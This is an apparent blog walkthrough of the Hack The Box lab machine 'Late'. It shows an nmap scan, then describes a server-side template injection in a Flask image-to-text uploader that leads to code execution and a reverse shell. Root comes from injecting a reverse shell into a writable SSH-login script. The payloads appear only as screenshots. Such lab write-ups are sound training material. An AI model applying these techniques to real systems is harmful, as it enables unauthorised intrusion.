Introduction
Hey Guys, Welcome Back. In this post, Let’s see how to CTF late from HTB and If you have any doubts comment down below 👇🏾
Hacking Phases in Late
First Step: Getting In
- Checking for Open Doors with Nmap
- Looking Around Web Pages
- Checking for Weak Spots
- Taking Advantage of Server’s Templates
- Finding User’s Sign
- Moving Up to Higher Levels
Next Step: Getting More Power
- Exploring Ways to Get More Power
- Getting More Power through a Scheduled Task
- Claiming Ultimate Control
Let’s Begin
Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on X.
Let’s Hack Late HTB 😌
https://twitter.com/HacklikeHacker
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.156
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-1024x444.webp)
Way to User
We saw that Port 80 was open for the web, so I decided to take a look at the website running on the computer.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-1-1024x393.webp)
As we scrolled down, we noticed two website addresses mentioned: one in a text link and the other in the support details. They were late.htb and images.late.htb.
![](https://techyrick.com/wp-content/uploads/2024/02/Squoosh-Screenshot-Feb-28-1024x612.webp)
I’m adding the two hosts to my hosts file on my local Kali machine.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-28-at-9.47.48 PM-1024x377.webp)
When we go to the images.late.htb website, we see a new page. It has a feature for uploading images that turns them into text.
If you look closely, it mentions that it uses Flask to perform this conversion.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-1024x412.webp)
I’m uploading a test image with some text to see how the feature works.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-2-1024x479.webp)
After I uploaded and scanned the image, the website downloaded a text file. It contained the text from the image, but it didn’t capture all of the text from the test image I uploaded.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-2.webp)
Since it uses Flask to change the image to text, it hinted that I should test for a possible Server-Side Template Injection (SSTI). So, I used an online tool to create a payload for SSTI on an image.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squ-1024x697.webp)
Now, I’m uploading the image I created to the file upload feature.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-28-at-9.55.28 PM-1024x387.webp)
It downloads a new file named results.txt, just like it did before.
![](https://techyrick.com/wp-content/uploads/2024/02/Squoosh-Screenshot-Feb-28-2-1024x505.webp)
Looking at the output, we can see that our SSTI payload worked and it was executed successfully.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-1.webp)
I made a new package that can run the “id” command from afar, letting you execute code remotely.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-1024x172.webp)
After getting the file, we can check that our code ran properly because we got the output from the “id” command.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh.webp)
Now, I’m changing the payload to create a reverse connection, and then I’ll upload the image.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-1-1024x46.webp)
When we looked at the netcat listener again, we saw that the reverse shell worked!
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-1024x361.webp)
We’re grabbing the user flag from the user’s home directory.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-2-1024x725.webp)
Way to Root
When I ran linpeas, I discovered some paths where I can write files.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-29-at-4.00.44 PM-1024x80.webp)
I also ran PSPY and noticed that the script ssh-alert.sh runs every time someone connects using SSH.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-3-1024x470.webp)
There was a similar script in the user’s home directory too, based on what we can see in the code.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-1-1024x629.webp)
Because we could edit the file and its location, I added my reverse shell code to the bash script.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-4-1024x41.webp)
Now, using my personal SSH keys to connect to the machine, we notice some strange behaviour.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-5.webp)
When I looked again at my netcat listener, I got a reverse shell as the root user.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-1-1024x378.webp)
The flag can be found in the root’s home directory.